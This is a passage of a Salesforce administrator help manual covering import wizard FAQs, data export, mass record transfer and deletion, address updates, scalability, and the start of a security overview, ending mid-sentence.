Yes, but only if you are the administrator, are using the organization import wizard, and are not in a Personal Edition
organization.

If your sharing model is Public Read/Write, new duplicate records that are owned by different users are de-duplicated and
merged into a single record whenever possible. For example, if two users have new records for Trident Inc. in your import
file, only one account named “Trident Inc.” is created. If the record in your import file matches an existing record in Salesforce,
the two records are merged if the record owner has access to edit the existing Salesforce record.

If your organization has Private or Public Read Only sharing, then two records are always created, unless the record already
exists and the relevant users have access to edit that existing record.
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You must add a Record Owner column to your import file so that the owner of the original data becomes the owner in the
system. In the Record Owner column, enter the users’ full usernames (for example, “jsmith@acme.com”) or first and last
names (for example, “Joe Smith”, or “Smith Joe” for Asian locales). This enables each user to maintain ownership of their
records, without overriding the sharing model. When importing records by Salesforce record ID, the Record Owner field
in your import file is ignored. All records retain their existing owners; record owners cannot be updated using the import
wizard.

Can the contact and business account import wizards recognize similar
names?

The wizards can recognize slight differences between business account names, business account sites, and contact names. The
wizards use the following rules in determining whether business account names, business account sites, or contact names are
the same and should be merged:

• Case is ignored, “Tom Jones” = “Tom JONES”
• Punctuation is ignored in business account names and sites, “I.B.M.” = “IBM”
• Spaces are ignored in business account names and sites, “Home Link” = “HomeLink”
• The following words are ignored if they appear at the beginning or end of the business account name and are separated by

spaces or punctuation. For example, “The Gap”, “Gap, The”, and “Gap Company” are all merged into one business account.

IncCoThe

CompanyCorporationCorp

InternationalLtdIncorporated

IntlLLCPLC

• Salutations are ignored in contact names, “Mr. Tom Jones” = “Tom Jones”
• “.com” is NOT ignored in business account names, for example, “acme.com” is not merged with “Acme”
• Middle names and initials are NOT ignored in contact names, “Tom T. Jones” is not merged with “Tom Jones”

Can I import existing contact and business account data to add
information?

When you import existing contacts, new information is added to the contact. Note that the contact in your import file must
match the existing contact in the system.

To import existing business account data, check the Overwrite existing account values box on the mapping page
of the wizard. With this box checked, you can insert or update existing business account fields with new data. However, you
cannot use this checkbox to update existing field data with blank values. You can update existing data only if you own the
record or have read/write access to it. With this box unchecked, the wizard updates any empty business account fields, but
does not touch any fields with existing data.
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How do the import wizards associate contacts and business accounts?
Import file rows that have both a business account name and a contact name create a business account and a contact, with the
contact(s) attached to that business account. You can have multiple contacts listed with the same business account name.
Business accounts without related contacts just create a business account record. Contacts without business account names
just create a contact record.

What type of data integrity warnings can I possibly expect?
Typical data integrity issues include values that are too long and invalid data, such as dates in the wrong format. The wizards
simply truncate data that is too long and ignore invalid data, but the records are still imported. In addition, the administrator
wizards offer you the chance to review the warnings before proceeding with the import.

Can I synchronize my contact and business account data after I’ve
imported it?

Yes. However, if you plan to regularly synchronize with Outlook, we recommend that you simply synchronize your data rather
than importing it via one of the import wizards.

Importing Person Accounts
Available in: Enterprise, Unlimited, and Developer Editions

• How do I prevent duplicate person accounts?

• How do I use the import wizard to mass update existing person accounts?

• Which person account fields are required for importing?

• Can I update lookup fields for my person accounts?

How do I prevent duplicate person accounts?
To prevent duplicate person account records from being created as a result of your import, populate a column in your import
file with the names, email addresses, Salesforce IDs, or external IDs of the person accounts. These are the fields that can be
used to match rows in your import file with existing records in Salesforce. In the wizard, you can specify the field you are using
for record matching and what action to take when a matching existing record is found.
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How do I use the import wizard to mass update existing person accounts?
To mass update existing person account records via the import wizards:

1. Run a person account report and export the results to Excel. To enable record matching, make sure to include the name,
email address, Salesforce ID, or external ID field in the report.

2. Use Excel or a similar application to update field values in the import file as desired.
3. Launch the appropriate import wizard.

• If you own the records in your import file, launch the Import My Person Accounts wizard from your personal settings
by selecting Import > Import Person Accounts.

• If the records in your import file are owned by multiple different users, launch the Import My Organization's Person
Accounts wizard from Setup by selecting Data Management > Import Person Accounts.

4. At the Prevent Duplicates step:

• If you are using the Import My Organization's Person Accounts wizard, choose the Yes radio button. This option is
not included in the other wizard.

• In the “Which field...” section, choose the field in your file to use for record matching: name, Salesforce ID, email
address, or external ID.

• In the “If existing records...” section, choose the second option, Update existing records and do not insert
any new records.

5. Proceed with the remaining steps in the wizard.
6. After finishing the wizard and receiving the email notification that the process has completed, verify in Salesforce that the

records have been updated as you intended.

Which person account fields are required for importing?
Each person account has a name field that should be included in your import file. In addition, if your administrator has defined
universally required custom fields for person accounts, those fields should be included in your import file.

Can I update lookup fields for my person accounts?
Yes, if person accounts have a lookup relationship with another object, you can use the import wizard to update the value of
that lookup field. We recommend the following procedure:

1. Run a person account report and export the results to Excel. In the report, include the Salesforce IDs of both the person
account and the object referenced in the lookup field.

2. Use Excel or a similar application to update field values in the import file as desired.
3. Start the Import My Organization's Person Accounts wizard from Setup by clicking Data Management > Import Person

Accounts.
4. At the Prevent Duplicates step:

• Choose the Yes radio button.
• Choose Salesforce ID.
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• Update existing records and do not insert any new records is automatically selected because you
are matching by Salesforce ID.

5. At the Specify Relationships step:

• Specify the record owner field in your import file.
• Check the box that corresponds to the lookup field you are including in your import file.

6. At the Define Lookup Matching step, choose Salesforce ID.

Note:  Any related records must already exist in Salesforce before proceeding. Related records will not be updated
during your import even if your import file contains different values for fields on those related records.

7. After finishing the wizard and receiving the email notification that the process has completed, verify in Salesforce that the
person account records have been updated as you intended.

Importing Leads
Available in: Professional, Enterprise, Unlimited, and Developer Editions

• How many leads can I import?

• Who can import leads?

• Who are imported leads assigned to?

• What happens to duplicate leads in my import file?

• Can I update existing leads during lead import?

• How do I prepare my lead import file?

• Can I mass-convert leads?

How many leads can I import?
50,000 at a time.

In addition to the record limits on each import, your import is also subject to the overall storage limits for your organization.

Who can import leads?
Only administrators, and users with the “Import Leads” permission, can import leads using the Import My Organization’s
Leads wizard.
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Who are imported leads assigned to?
Imported leads are assigned to users or queues according to the lead assignment rule chosen in the wizard. If you do not choose
an assignment rule or if the rule fails to properly assign the lead, then the administrator doing the import is assigned as the
owner of the imported leads. Alternatively, you can add a Record Owner column to your import file to specify the lead
owners (either users or queues). In addition, when importing records by Salesforce record ID, the Record Owner field in
your import file is ignored. All records retain their existing owners; record owners cannot be updated using the import wizard.

What happens to duplicate leads in my import file?
The import wizard de-duplicates leads in your import file if you choose a Matching Type of Salesforce ID, Name, or
Email. Alternately, if you choose a Matching Type of None, duplicate leads will be created in Salesforce and you can merge
them later.

When importing new leads for a campaign via the Lead Import Wizard, the Matching Type option is not available; the
wizard does not merge duplicate records. However, if you are using the Campaign Update Wizard, duplicate leads are not
created. The Lead ID field in your import file ensures that the correct, existing lead will be updated with the campaign status
information.

Can I update existing leads during lead import?
Yes, if you use a Matching Type of Salesforce ID, Name, or Email. For example, if you are matching by email and a
record in your source file has the same email as a lead in Salesforce, then that lead will be updated in Salesforce, provided you
have read/write access to that lead. If you are not matching by email and there is a record in Salesforce with the same email,
then a new lead will be created.

How do I prepare my lead import file?
Save your import data as a CSV (comma-separated values) file, then mark each column in your file with the appropriate lead
field label, as specified in Field Mapping for Importing Leads.

Note:  If commas are not appropriate for your locale, use a tab or other delimiter.

Can I mass-convert leads?
No, Salesforce doesn’t support mass-converting leads. Consider the following alternatives.

• Export the leads you want to convert through the Data Loader or one of the APIs, ensure that you have an account created
for the lead you’re importing, and insert them back into Salesforce as contacts.
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Note:  In the activity history there won’t be an entry noting that the contact was created by the Data Loader or
an API call.

• Use the convertLead DML operation. The convertLead DML operation converts a lead into an account and contact,
as well as (optionally) an opportunity.

Note:  Before you convert the leads, be sure to start with clean data. Your leads won’t convert if they:

◊ Belong to different companies

◊ Already exist as a contact

◊ Match multiple contacts

• Find a third-party app on AppExchange.

Note:  Third-party apps are likely at an additional cost and may not have the exact functionality you want.

Importing Campaign Members
Available in: Professional, Enterprise, Unlimited, and Developer Editions

• Why are there two campaign import wizards?

• How many campaign members can I import?

• Who can import campaign members?

• What status is assigned to campaign members?

• How do I prepare my campaign import file?

Why are there two campaign import wizards?
You can access the campaign import wizards via the Add Members - Import File and Update & Add Members - Import
File links on the Manage Members page, which is available from any campaign detail page. The wizards are:

• Lead Import Wizard: To access this wizard from a campaign detail page, click Manage Members > Add Members -
Import File > Import Leads. Use this wizard to import leads. It imports a list of names, creates or updates leads in the
system, and associates those leads with your campaign.

• Campaign Update Wizard: To access this wizard from a campaign detail page, click Manage Members > Update & Add
Members - Import File > Update & Add Campaign Members. Use this wizard to update the campaign member statuses
of existing leads and contacts. It imports a list of existing Salesforce contacts and leads, associates them with your campaign,
and updates their response history.
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How many campaign members can I import?
The number of campaign members that can be imported is determined by the following wizards:

• Lead Import Wizard: Import up to 50,000 leads at one time.
• Campaign Update Wizard: Update up to 50,000 existing contacts and leads at one time.

In addition to the record limits, your import is also subject to the overall storage limits for your organization.

Who can import campaign members?
In order to use the campaign import wizards to import new leads for a campaign or update the campaign history for multiple
leads and contacts, users must have the Marketing User checkbox selected on their personal information. They must also
have the Marketing User profile (or the “Edit” permission on campaigns and “Import Leads” permission).

What status is assigned to campaign members?
With the campaign import wizards, you can assign a campaign member status to a lead or contact in one of two ways:

• Add a Status column to your import file. Enter the status for each lead or contact on the campaign.
• Select a default status in the campaign import wizard. Any lead or contact with a blank or invalid status in your import

file will automatically be assigned to the default status.

How do I prepare my campaign import file?
A campaign import file can be prepared by using one of the following wizards:

• Lead Import Wizard: Prepare your import file of new leads using Excel.
• Campaign Update Wizard: Update only the member status of an existing lead or contact. Your import file must include

a Status column plus a Record Id column that contains the unique Salesforce Contact ID or Lead ID values for the
leads and contacts.

Importing Solutions
Available in: Professional, Enterprise, Unlimited, and Developer Editions

• How many solutions can I import into my organization?

• How do I prevent duplicate solutions?

• Can I use the import wizard to mass update existing solution records?

• Can I update lookup fields for my solutions?
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• Can I import solution categories?

• Can I import solutions written in HTML format?

• Which solution fields are required for importing?

How many solutions can I import into my organization?
50,000 at a time.

In addition to the record limits on each import, your import is also subject to the overall storage limits for your organization.

How do I prevent duplicate solutions?
To prevent duplicate solutions from being created as a result of your import, include a column in your import file that has
either solution titles, Salesforce IDs, or external IDs. These are the fields that can be used to match rows in your import file
with existing records in Salesforce. In the wizard, you can specify the field you are using for record matching and what action
to take when a matching existing record is found.

Can I use the import wizard to mass update existing solution records?
Yes, you can mass update existing solution records via the import wizard:

1. Run a solution report and export the results to Excel. To enable record matching, make sure to include the solution title,
Salesforce ID, or external ID field in the report.

2. Use Excel or a similar application to update field values in the import file as desired.
3. Start the Import My Organization's Solutions wizard from Setup by clicking Data Management > Import Solutions.
4. At the Prevent Duplicates step:

• Choose the Yes radio button.
• Choose the field for record matching that you included in your file: name, Salesforce ID, or external ID.
• Choose the option Update existing records and do not insert any new records.

5. After finishing the wizard and receiving the email notification that the process has completed, verify in Salesforce that the
solution records have been updated as you intended.

Can I update lookup fields for my solutions?
Yes. If your solutions have a custom field that creates a lookup relationship with a custom object, you can use the import wizard
to update the value of that field. We recommend the following procedure:

1. Run a solution report and export the results to Excel. Include the Salesforce IDs of both the solution and the lookup field
in the report.

2. Use Excel or a similar application to update field values in the import file as desired.
3. Start the Import My Organization's Solutions wizard from Setup by clicking Data Management > Import Solutions.
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4. At the Prevent Duplicates step:

• Choose the Yes radio button.
• Choose Salesforce ID.
• Update existing records and do not insert any new records is automatically selected because you

are matching by Salesforce ID.

5. At the Specify Relationships step:

• Choose the author field, if any, in your import file.
• Check the box that corresponds to the lookup field you are including in your import file.

6. At the Define Lookup Matching step, choose Salesforce ID.
7. After finishing the wizard and receiving the email notification that the process has completed, verify in Salesforce that the

solution records have been updated as you intended.

Can I import solution categories?
Categories for solutions cannot be imported at this time.

Can I import solutions written in HTML format?
Yes. However, unless your organization has enabled HTML solutions, HTML tags will display in the solutions after they are
imported.

Which solution fields are required for importing?
For data quality reasons, you should provide a solution title for each solution you are importing. If you are updating existing
solutions and a row in your import file does not have a solution title or you do not map the solution title field, the wizard does
not change the existing solution title. However, if you are importing new solutions and a row in your import file does not have
a solution title or you do not map the solution title field, the record will be created with the value “[Not Provided]” as the
solution title. In addition, if your administrator has defined universally required custom fields for solutions, those fields should
be included in your import file.

Importing Custom Objects
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

• How many custom objects can I import into my organization?

• How do I prevent duplicate custom object records?

• Can I use the import wizard to mass update existing custom object records?

• Which fields are required to import custom objects?
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• Can I update lookup fields for my custom object?

• Why does the import wizard not allow me to match on the record owner?

• Can I use the import wizard to transfer custom objects to other users?

How many custom objects can I import into my organization?
You can import up to 50,000 records for a given custom object at one time.

In addition to the record limits on each import, your import is also subject to the overall storage limits for your organization.

How do I prevent duplicate custom object records?
To prevent duplicate custom object records from being created as a result of your import, include a column in your import file
that has either record names, Salesforce IDs, or external IDs. These are the fields that can be used to match rows in your
import file with existing records in Salesforce. In the wizard, you can specify the field you are using for record matching and
what action to take when a matching existing record is found.

Can I use the import wizard to mass update existing custom object
records?

Yes, you can mass update existing custom object records via the import wizard:

1. Run a custom object report and export the results to Excel. To enable record matching, make sure to include the name,
Salesforce ID, or external ID field in the report.

2. Use Excel or a similar application to update field values in the import file as desired.
3. Start the Import My Organization's Custom Objects wizard from Setup by clicking Data Management > Import Custom

Objects.
4. At the Prevent Duplicates step:

• Choose the Yes radio button.
• Choose the field for record matching that you included in your file: name, Salesforce ID, or external ID.
• Choose the option Update existing records and do not insert any new records.

5. After finishing the wizard and receiving the email notification that the process has completed, verify in Salesforce that the
custom object records have been updated as you intended.

Which fields are required to import custom objects?
Each custom object has a name field that should be included in your import file. In addition, if your custom object has a
master-detail relationship with another kind of record, then you must provide the name, Salesforce ID, or external ID of the
master record. If the wizard does not find a match for the master record, that custom object record will not be imported. Also,
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if your administrator has defined universally required custom fields for the custom object, those fields should be included in
your import file.

Can I update lookup fields for my custom object?
Yes, if your custom object has a lookup relationship with another object, you can use the import wizard to update the value
of that field. We recommend the following procedure:

1. Run a custom object report and export the results to Excel. Include the Salesforce IDs of both the custom object and the
lookup field in the report.

2. Use Excel or a similar application to update field values in the import file as desired.
3. Start the Import My Organization's Custom Objects wizard from Setup by clicking Data Management > Import Custom

Objects.
4. At the Prevent Duplicates step:

• Choose the Yes radio button.
• Choose Salesforce ID.
• Update existing records and do not insert any new records is automatically selected because you

are matching by Salesforce ID.

5. At the Specify Relationships step:

• Choose the record owner field, if any, in your import file.
• Check the box that corresponds to the lookup field you are including in your import file.

6. At the Define Lookup Matching step, choose Salesforce ID.
7. After finishing the wizard and receiving the email notification that the process has completed, verify in Salesforce that the

custom object records have been updated as you intended.

Note that if a custom object has a master-detail relationship with another object, you cannot update the value of the required
master record via the import wizard.

Why does the import wizard not allow me to match on the record owner?
If your custom object has a master-detail relationship with another kind of record, then the record owner of the custom object
is automatically set to the owner of the master record and cannot be changed.

Can I use the import wizard to transfer custom objects to other users?
Yes, as long as the user to whom you are transferring the record has the “Read” permission for the custom object.
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MANAGE DATA

Exporting Backup Data
Weekly export available in: Enterprise and Unlimited Editions

Monthly export available in: All editions, except for Database.com

User Permissions Needed

“Data Export”To export data:

Your organization can generate backup files of your data on a weekly or monthly basis depending on your edition. You can
export all of your organization's data into a set of comma-separated values (CSV) files.

Note:  Users with the “Data Export” permission can view all exported data and all custom objects and fields in the
Export Service page. This permission is granted by default only to the System Administrator profile because it enables
wide visibility.

You can generate backup files manually once every six days (for weekly export) or 28 days (for monthly export). You can also
schedule backup files to generate automatically at weekly or monthly intervals.

1. From Setup, click Data Management > Data Export and Export Now or Schedule Export.

• The Export Now option prepares your files for export immediately. This option is only available if enough time has
passed since your last export.

• The Schedule Export option allows you to schedule the export process for weekly or monthly intervals.

2. Select the desired encoding for your export file.
3. Select Include images, documents, and attachments and Include Chatter files and Salesforce

CRM Content document versions to include these items in your export data.
4. Select Replace carriage returns with spaces to have spaces instead of carriage returns or line breaks in your

export files. This is useful if you plan to use your export files for importing or other integrations.
5. If you're scheduling your export, select the frequency (only available for organizations with monthly exports), start and end

dates, and time of day for your scheduled export.
6. Under Exported Data, select the types of data to include in your export. We recommend that you select Include all data

if you are not familiar with the terminology used for some of the types of data. Note the following:

• Formula and roll-up summary fields are always excluded from exports.
• If your organization uses divisions, data from all divisions is included in the export.
• If your organization uses person accounts and you are exporting accounts, all account fields are included in the account

data.
• If your organization uses person accounts and you are exporting contacts, person account records are included in the

contact data. However, the contact data only includes the fields shared by contacts and person accounts.
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• For information on field limitations, see the Salesforce Field Reference Guide.

7. Click Start Export or Save.

Salesforce creates a zip archive of CSV files and emails you when it's ready. Exports typically finish within 48 hours of
submission, and large exports are broken up into multiple files. Follow the link in the email or click Data Export to
download the zip file. Zip files are deleted 48 hours after the email is sent. The 48-hour time limit doesn't include weekends,
which means if your download file is ready on Thursday at 4 p.m., that file isn't deleted until Monday at 4 p.m.

Note:  For security purposes, Salesforce may require users to pass a CAPTCHA user verification test to export
data from their organization. This simple text-entry test prevents malicious programs from accessing your
organization's data. To pass the test, users must correctly type the two words displayed on the overlay into the
overlay's text box field. Note that the words entered into the text box field must be separated by a space.

Tip:  Any automated processes that process the export files should rely on the column headings in the CSV files,
rather than the position of the columns.

Depending on the encoding selected, you may have to make adjustments to the export file before viewing it. Use the following
instructions that apply to the character encoding you selected.

Viewing Unicode (UTF-8) Encoded Export Files
If you have Microsoft Excel 2003:

1. Open Microsoft Excel.
2. Click File > New.
3. Click Data > Import External Data > Import Data.
4. Select the CSV file to open and Microsoft Excel will launch the text import wizard.
5. Select “Delimited” and choose the “Unicode (UTF-8)” option for File origin.
6. Click Next.
7. Select “Comma” in the Delimiters section and click Finish. You may be prompted to select a range of cells.

Note:  If commas are not appropriate for your locale, use a tab or other delimiter.

8. Repeat these steps for each file.

If you have an earlier version of Microsoft Excel (pre 2003):

1. Open the file in Microsoft Excel.
2. Select File > Save As.
3. Save the file as type Web Page.
4. Select Tools > Options > General tab and click the Web Options button.
5. Select the Encoding tab, and then choose the “Unicode (UTF-8)” option.
6. Click OK to close the dialog boxes.
7. Select File > Save to save the file with selected encoding.
8. Repeat these steps for each file.

Viewing Unicode (UTF-16, Big Endian) Encoded Export Files
Open the export files in a text editor that supports this character set. Microsoft Excel does not support this character set.
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Viewing Unicode (Little Endian) Encoded Export Files
1. Open the file in Microsoft Excel.
2. Click on column A to highlight the entire first column.
3. Open the Data menu and choose Text to Columns.
4. Select the “Delimited” radio button and click Next.
5. Select “Comma” in the Delimiters section and click Finish.

Note:  If commas are not appropriate for your locale, use a tab or other delimiter.

6. Repeat these steps for each file.

Transferring Records Overview
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Accounts, Campaigns, Contacts, Contracts, Leads, and Cases are not available in Database.com.

User Permissions Needed

“Transfer Record”

AND

“Edit” on the object type

To transfer multiple accounts, campaigns, contacts, contracts,
and custom objects:

“Transfer Leads” OR “Transfer Record”

AND

“Edit” on leads

To transfer multiple leads:

“Transfer Cases” OR “Transfer Record”

AND

“Edit” on cases

To transfer multiple cases:

A record owner, or any user above the owner in the role or territory hierarchy, can transfer a single record to another user.
With some objects, like cases, leads, and campaigns, a user may be granted access to transfer records through sharing. Depending
on the type of object, there may be multiple ways to transfer records to another user:

Available forMethod

Accounts, campaigns, cases, contacts, contracts, leads, and
custom objects

Transfer a single record

Cases, leads, and custom objects, which can belong to either
a user or a queue

Transfer multiple records by selecting the records from a list
view and clicking Change Owner
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Available forMethod

Accounts, leads, and custom objectsTransfer multiple records using the Mass Transfer tool

Ability to Change Ownership
• Users with the “Modify All Data” permission, or users with the “Modify All” permission for the given object, can transfer

any record, regardless of who owns the record.
• To transfer a single record or multiple records from a list view, the new owner must have at least the “Read” permission

on the object type. This rule does not apply if you use the mass transfer tool.
• To transfer ownership of any single record in an organization that does not use territory management, a user must have

the appropriate “Edit” permission and either own the record or be above the owner in the role hierarchy.

For example, to transfer ownership of an account, a user must have the “Edit” permission on accounts and read sharing
access to the account. Additionally, the new owner of the record must have at least “Read” permission on accounts.

The Public Full Access and Public Read/Write/Transfer sharing settings give all users the ability to transfer ownership of
that type of record as long as they have the appropriate “Edit” permission.

• In organizations that use territory management, users that have been assigned to territories can be enabled to transfer the
accounts in their territories, even if they are not the record owner.

• To transfer campaigns, users must also have the Marketing User checkbox selected on their user record.
• Partner accounts can only be transferred to users with the “Manage External Users” permission.
• You cannot assign an account with Customer Portal users to an owner who is a partner user.

See Also:
Mass Transferring Records
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Mass Transferring Records

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer Database.com Editions

Accounts, Service Contracts, and Leads are not available in Database.com.

User Permissions Needed

“Transfer Record”

AND

“Edit” on the object type

AND

“Transfer Leads”

To mass transfer accounts and service contracts:

“Transfer Record”

AND

“Edit” on the object type

To mass transfer custom objects:

“Transfer Leads” OR “Transfer Record”

AND

“Edit” on leads

To mass transfer leads:

Use the Mass Transfer tool to transfer multiple accounts, leads, service contracts, and custom objects from one user to another.

Note:  To transfer any records that you do not own, you must have the required user permissions as well as read
sharing access on the records.

1. From Setup, click Data Management > Mass Transfer Records.
2. Click the link for the type of record to transfer.
3. Optionally, fill in the name of the existing record owner in the Transfer from field. For leads, you can transfer from

users or queues.
4. In the Transfer to field, fill in the name of new record owner. For leads, you can transfer to users or queues.
5. If your organization uses divisions, select the Change division.... checkbox to set the division of all transferred records

to the new owner’s default division.
6. When transferring accounts, you can:

• Select Transfer open opportunities not owned by the existing account owner to transfer open
opportunities owned by other users that are associated with the account.

• Select Transfer closed opportunities to transfer closed opportunities associated with the account. This option
applies only to closed opportunities owned by the account owner; closed opportunities owned by other users are not
changed.
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• Select Transfer open cases owned by the existing account owner to transfer open cases that are owned
by the existing account owner and associated with the account.

• Select Transfer closed cases to transfer closed cases that are owned by the existing account owner and associated
with the account.

• Select Keep Account Team to maintain the existing account team associated with the account. Deselect this checkbox
if you want to remove the existing account team associated with the account.

• Select Keep Opportunity Team on all opportunities to maintain the existing team on opportunities
associated with this account. Any opportunity splits are preserved, and split percentages assigned to the previous owner
transfer to the new one. If this box is unchecked, all opportunity team members and splits are deleted when the
opportunity is transferred.

Note:  If you transfer closed opportunities, the opportunity team is maintained, regardless of this setting.

7. Enter search criteria that the records you are transferring must match. For example, you could search accounts in California
by specifying Billing State/Province equals CA.

8. Click Find.
9. Select the checkbox next to the records you want to transfer. Optionally, check the box in the column header to select all

currently displayed items.

Note:  If duplicate records are found, you must select only one of the records to transfer. Transferring duplicate
records results in an error.

Duplicate records may display if you filter leads based on Campaign Member Status and a matching lead has the
same campaign member status on multiple campaigns. For example, if you specify Campaign Member Status
equals Sent, and a matching lead named John Smith has the status Sent on two campaigns, his record will
display twice.

10. Click Transfer.

Transfer of Associated Items

When you change record ownership, some associated items that are owned by the current record owner are also transferred
to the new owner.

Associated items that are also transferredRecord

Contacts (on business accounts only), attachments, notes, open activities, open opportunities
owned by the current account owner, and optionally, closed opportunities and open
opportunities owned by other users.

Accounts

Open activities. When transferring leads to a queue, open activities are not transferred.Leads

Access to Transferred Items

When transferring accounts and their related data in Professional, Enterprise, Unlimited, and Developer Editions, all previous
access granted by manual sharing, Apex managed sharing, or sharing rules is removed. New sharing rules are then applied to
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the data based on the new owner. The new owner may need to manually share the transferred accounts and opportunities as
necessary to grant access to certain users.

See Also:
Transferring Records Overview

Deleting Mass Data
Available in: All Editions

This feature is only available in Database.com via the API. You can only mass delete records of custom objects in
Database.com.

User Permissions Needed

“Modify All Data”To mass delete data:

You can delete multiple cases, solutions, accounts, contacts, leads, products, or activities at one time. Before you use mass
delete, we strongly suggest you run a report to archive your information. We also strongly advise you to run a weekly export
of your data; see Exporting Backup Data on page 552.

To delete multiple records:

1. From Setup, click Data Management > Mass Delete Records.
2. Click the link for the type of record to delete.
3. Review the information that will be deleted along with the records.
4. Specify conditions that the selected items must match, for example, “State equals California.”
5. When deleting accounts, check the appropriate boxes if you want to delete accounts with attached closed/won opportunities

or attached opportunities owned by other users.
6. When deleting products, check Archive Products... if you want to include products that are on opportunities.

Archived products are not moved to the Recycle Bin. Check this option to:

• Delete products that are not on opportunities and move them to the Recycle Bin.
• Archive products that are on opportunities. These products are not moved to the Recycle Bin and cannot be recovered.

Leave this box unchecked to delete only those products that are not on opportunities. Selected products that are on
opportunities will remain checked after the deletion to indicate they were not included in the deletion.

7. Choose Search to find records that match.
8. Select the box next to the items you want to delete. Optionally, check the box in the column header to select all currently

displayed items.
9. To permanently delete records, select Permanently delete the selected records. Please note that selecting

this option prevents you from recovering the selected records from the Recycle Bin.
10. Click Delete. If you did not select Permanently delete the selected records, deleted items are moved to the

Recycle Bin.
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Notes on Using Mass Delete
Consider the following when using mass delete:

• You can delete up to 250 items at one time.
• When you delete a record, any associated records that display on that record's related lists are also deleted.
• Accounts and contacts associated with cases cannot be deleted.
• Partner accounts with partner users cannot be deleted.
• Contacts enabled for Self-Service, and their associated accounts, cannot be deleted.
• When deleting products, all related price book entries are deleted with it.
• Products on opportunities cannot be deleted, but they can be archived.
• When you delete activities:

◊ Any archived activities that meet the conditions are also deleted.
◊ Requested meetings aren't included in the mass-delete until they're confirmed and automatically converted to events.

• The child events of a recurring event are not displayed in the list of possible items to delete, but they are deleted along
with their associated event series.

• Deleting a master solution does not delete the translated solutions associated with it. Instead, each translated solution
becomes a master solution.

• Deleting a translated solution removes the association with its master solution.

Sample Uses for Mass Delete
The following examples illustrate some common uses of mass delete.

• You imported your organization's leads incorrectly and you want to delete those imported leads. View the Using Mass
Delete to Undo Imports document for complete instructions.

• A user named John Smith recently left your organization, and he had several contacts that were duplicates of other users'
data. To delete these duplicate contacts, select contacts as the record type to delete and enter “Owner Alias equals jsmith.”

• Your organization may have formerly entered all leads as accounts with the Type field set to “Prospect.” You now want
to convert these accounts into leads. To do this, run a report of these accounts, export it to Excel, and then use the Import
My Organization’s Leads wizard to import the data as leads. Then using mass delete, select accounts as the record type to
delete and enter “Type equals Prospect” to locate all accounts you want to delete.

• You want to delete all the leads that have been converted for your organization. Select the lead record type, enter “Converted
equals 1” for the search criteria, then choose Search.

You might also want to use mass delete to clean up any old records you may have, to delete web-generated leads that were
created incorrectly, or to delete accounts and contacts with whom you no longer do business.

See Also:
Undoing an Import
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Mass Updating Addresses
Available in: All Editions except for Database.com.

User Permissions Needed

“Modify All Data”To mass update addresses:

“Modify All Data”

AND

“Activate Contracts”

To mass update addresses of contracts:

Use mass updating addresses to standardize on one naming convention for a country and state/province for your organization’s
existing address fields in accounts, contacts, contracts, and leads. For example, instead of having multiple records with US,
USA, or United States in the address fields, you can use mass updating addresses to enter one name, such as US, for all of the
records.

Note:  Mass updating addresses allows you to make data in text-based state and country fields more consistent. An
alternative is to switch to state and country picklists, a beta feature in Spring ’13. See State and Country Picklists
Overview—Beta.

1. From Setup, click Data Management > Mass Update Addresses.
2. Select the type of data to update - Countries or State/Province. If you chose State/Province, enter the country

in which to update the state or province. Click Next to continue.
3. Select the values to update and click Add. The Selected Values box displays the values that will be updated. To remove

values, click Remove.

The Available Values box displays the address values found in existing records. To find additional addresses to update
together as a group, enter all or part of a value and click Find.

If your organization has large amounts of data, instead of using the Available Values box, enter existing values to update
in the text area. Each value should be separated by a new line.

4. In the Replace selected values with field, enter the value with which to replace the specified address data, and
click Next. If your organization has large amounts of data, this field is called Replace entered values with.

The number and type of address records which will be updated in your organization are displayed. If your organization
has large amounts of data, only the values that will be updated are displayed.

5. Click Replace to update the values.

Tips on Mass Updating Addresses

• As a best practice, update countries first, and then update states or provinces within that newly standardized country value.

• Use the mass updating address tool to convert inconsistent address formats to one international standard, such as ISO
codes. For a list of ISO codes, see the International Organization for Standardization website.

• Use the mass updating tool regularly to cleanse your address data of inconsistent values created by users or via import, sync,
or the Force.com API.
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• Any country or state/province value can be created manually or via import, sync, or the Force.com API. Address values
are not validated upon creation.

• Remember to change filter conditions to reflect any address updates. For example, if you change “United States” to “US,”
then assignment rules, Web-to-Lead, Web-to-Case, Email-to-Case, and On-Demand Email-to-Case will continue to
use “United States” unless updated to “US.”

Scalability FAQ
• How scalable is Salesforce?

• Will I see a degradation in performance as Salesforce’s subscriber base grows?

• Can I house a backup of my data at my own site?

How scalable is Salesforce?
The service has the capacity to scale to the largest of teams. The architecture behind the service was designed to handle millions
of users. We scale as rapidly as our customers require.

Will I see a degradation in performance as Salesforce’s subscriber base
grows?

No. We are very conscious of performance and have designed the service to be scalable in such a way that we can constantly
stay ahead of customer demand. Our architecture allows us to easily add web and application servers to accommodate more
users. The system architecture also allows us to add more database servers as needed to accommodate more users. In addition,
the facility that houses our servers provides us with guaranteed bandwidth, which we can increase as needed.

Can I house a backup of my data at my own site?
In order for you to house your own data, it would require you to own an Oracle license, database hardware, application server
hardware, and application server license, and also have an Oracle DBA on staff. In order to keep administration and overall
total cost of ownership down, we handle all of this for you.

However, you can sign up to receive weekly backup files of your Salesforce data.
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SECURITY

Security Overview
Salesforce is built with security as the foundation for the entire service. This foundation includes both protection for your data
and applications, and the ability to implement your own security scheme to reflect the structure and needs of your organization.

The security features of Salesforce provide both strength and flexibility. However, protecting your data is a joint responsibility
between you and salesforce.com. The security features in Salesforce enable you to empower your users to do their jobs efficiently,
while also limiting exposure of data to the users that need to act upon it. Implement security controls that you think are
appropriate for the sensitivity of your data. Your data is protected from unauthorized access from outside your company, and
you should also safeguard it from inappropriate usage by your users.

See the following topics to get more information about the various security components in Salesforce:

• Trust and Salesforce.com

• Security Infrastructure

• Auditing

• Session Security

• User Security Overview

• User Authentication

• Network-Based Security

• CAPTCHA Security for Data Exports

• My Domain Overview

• About Identity Providers and Service Providers

• About Passwords

• Securing Data Access

See Also:
Security Implementation Guide

Trust and Salesforce.com
Trust starts with transparency. That’s why salesforce.com displays real-time information on system performance and security
on the trust site at http://trust.salesforce.com. This site provides live data on system performance, alerts for current and recent
phishing and malware attempts, and tips on best security practices for your organization.

The Security tab on the trust site includes valuable information that can help you to safeguard your company's data. In particular,
phishing and malware are Internet scams on the rise.

Phishing is a social engineering technique that attempts to acquire sensitive information such as usernames, passwords and
